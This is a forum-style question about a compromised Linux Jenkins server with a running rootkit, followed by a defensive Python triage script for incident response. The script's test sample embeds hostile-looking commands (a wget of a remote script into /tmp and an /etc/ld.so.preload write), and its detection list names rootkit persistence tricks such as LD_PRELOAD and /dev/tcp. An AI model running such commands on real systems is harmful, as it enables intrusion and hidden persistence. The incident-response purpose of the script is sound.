Friday, 27 March 2015

What to do when you find a running Rootkit in Linux?



My Linux Jenkins server was compromised and a rootkit was installed. I know this because a running process shows me the path the Jenkins job is running, and it includes a URL with a path pointing to a Python script. On a different host I opened that script and found several scripts that attempt to install a rootkit, along with a destination URL, presumably to tell them which rootkit was successful.


I can see some questionable binaries under /tmp. I opened one of those binaries with a decompiler, but I'm not sure what to look for.


So, what does one do in this situation to find out more about the attacker and, possibly, what the intent was?


Asking here since none of the books or articles I've read address those two questions. I do know I have to assume any data on that host was compromised. My goal is to learn more about the attacker and the attack.


Other info: I became aware of it when the network team noticed GBs of data going out from our Linux Jenkins host. They closed the port and we unplugged the host. The IP that the job is getting the Python script from appears to be in the US, but nothing more specific according to IP lookups. The destination IP is in Jinan, China.
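The question has no answer on this page. As an added example (not code from the original post or from the asker), here is the kind of read-only first-look triage a responder would run against that host, or against a mounted image of it, before anything is rebuilt: snapshot the running processes (command line, exe target and cwd, since a dropper often deletes its own binary after launch and `/proc/PID/exe -> ... (deleted)` is then the only copy), and pull URLs, public IPv4 addresses and rootkit-style strings out of the files dropped under /tmp without executing them. The `SAMPLE` bytes, the process snapshot in the test, the IP addresses (documentation ranges) and the `ROOTKIT_HINTS` list are all constructed for the example and are not taken from the post; the hint list is a set of leads, not a rootkit signature.

```python
#!/usr/bin/env python3
"""Read-only first-look triage for a compromised Linux host or a mounted image of it.

Nothing here executes a dropped file; it hashes them and extracts indicators,
and it reads the live process table from /proc so the command line that first
revealed the compromise (a Jenkins job fetching a Python script by URL) and any
already-deleted executables are recorded before the host is wiped.
"""
import hashlib
import os
import re
from dataclasses import dataclass, field

STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")                    # like `strings -n 6`
URL_RE = re.compile(rb"(?:https?|ftp)://[^\s\"'<>]+")
IPV4_RE = re.compile(rb"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
# Substrings typical of Linux rootkit droppers and persistence (assumed list): leads, not proof.
ROOTKIT_HINTS = (b"LD_PRELOAD", b"ld.so.preload", b"init_module", b"insmod",
                 b"/etc/rc.local", b"crontab", b"/dev/tcp/", b"ptrace", b"chattr")

# Constructed stand-in for a dropped binary (ELF magic plus a few embedded strings).
SAMPLE = (b"\x7fELF\x02\x01\x01" + b"\x00" * 41
          + b"wget http://203.0.113.7/r.py -O /tmp/.x\0"
          + b"echo /tmp/.x.so > /etc/ld.so.preload\0LD_PRELOAD=/tmp/.x.so\0"
          + b"connect 198.51.100.23:443 via 10.0.0.5\0")


@dataclass
class Triage:
    sha256: str
    size: int
    is_elf: bool
    urls: list = field(default_factory=list)
    ips: list = field(default_factory=list)
    hints: list = field(default_factory=list)


def public_ipv4(ip: str) -> bool:
    """True for a well-formed dotted quad outside loopback/private/link-local/multicast."""
    octets = [int(o) for o in ip.split(".")]
    if len(octets) != 4 or any(o > 255 for o in octets):
        return False
    a, b = octets[0], octets[1]
    if a in (0, 10, 127) or a >= 224:
        return False
    if (a == 169 and b == 254) or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168):
        return False
    return True


def printable_strings(data: bytes) -> list:
    """Printable runs of 6+ bytes, for the analyst to eyeball."""
    return [s.decode() for s in STRING_RE.findall(data)]


def triage_bytes(data: bytes) -> Triage:
    """Hash a dropped file and extract indicators from its contents, never executing it."""
    t = Triage(hashlib.sha256(data).hexdigest(), len(data), data.startswith(b"\x7fELF"))
    t.urls = list(dict.fromkeys(u.decode() for u in URL_RE.findall(data)))
    t.ips = list(dict.fromkeys(ip for ip in (m.decode() for m in IPV4_RE.findall(data))
                               if public_ipv4(ip)))
    t.hints = [h.decode() for h in ROOTKIT_HINTS if h in data]
    return t


def triage_file(path: str) -> Triage:
    with open(path, "rb") as f:
        return triage_bytes(f.read())


def proc_snapshot(proc: str = "/proc") -> dict:
    """pid -> {cmdline, exe, cwd} from a live /proc; exe keeps the kernel's ' (deleted)' suffix."""
    snap = {}
    for pid in (p for p in os.listdir(proc) if p.isdigit()):
        base = os.path.join(proc, pid)
        entry = {}
        try:
            with open(os.path.join(base, "cmdline"), "rb") as f:
                entry["cmdline"] = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue                                          # process exited mid-walk
        for link in ("exe", "cwd"):
            try:
                entry[link] = os.readlink(os.path.join(base, link))
            except OSError:                                   # kernel thread, or not our uid
                entry[link] = "?"
        snap[pid] = entry
    return snap


def interesting_processes(snap: dict) -> dict:
    """Processes whose command line carries a URL or whose binary was deleted from disk."""
    return {pid: e for pid, e in snap.items()
            if URL_RE.search(e["cmdline"].encode()) or e["exe"].endswith(" (deleted)")}


def main(dirs=("/tmp", "/var/tmp", "/dev/shm")):
    for pid, e in interesting_processes(proc_snapshot()).items():
        print(f"[proc {pid}] exe={e['exe']} cwd={e['cwd']} cmd={e['cmdline'][:120]}")
    for d in dirs:
        for root, _, files in os.walk(d):
            for name in files:
                path = os.path.join(root, name)
                if not os.path.isfile(path):                  # skip sockets/FIFOs (open would block)
                    continue
                try:
                    t = triage_file(path)
                except OSError:
                    continue
                if t.is_elf or t.urls or t.ips or t.hints:
                    print(f"[file] {path} sha256={t.sha256} elf={t.is_elf} "
                          f"urls={t.urls} ips={t.ips} hints={t.hints}")


if __name__ == "__main__":
    main()
```

Run it as root on the live host (or point `proc_snapshot` and `main` at a mounted image) and save the output alongside hashes of everything under /tmp before the box is touched further; the SHA-256 values and the extracted URLs/IPs are what you can later correlate with the proxy and NetFlow records the network team already has for the outbound transfer. Everything it reports is a lead to chase, not an attribution.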




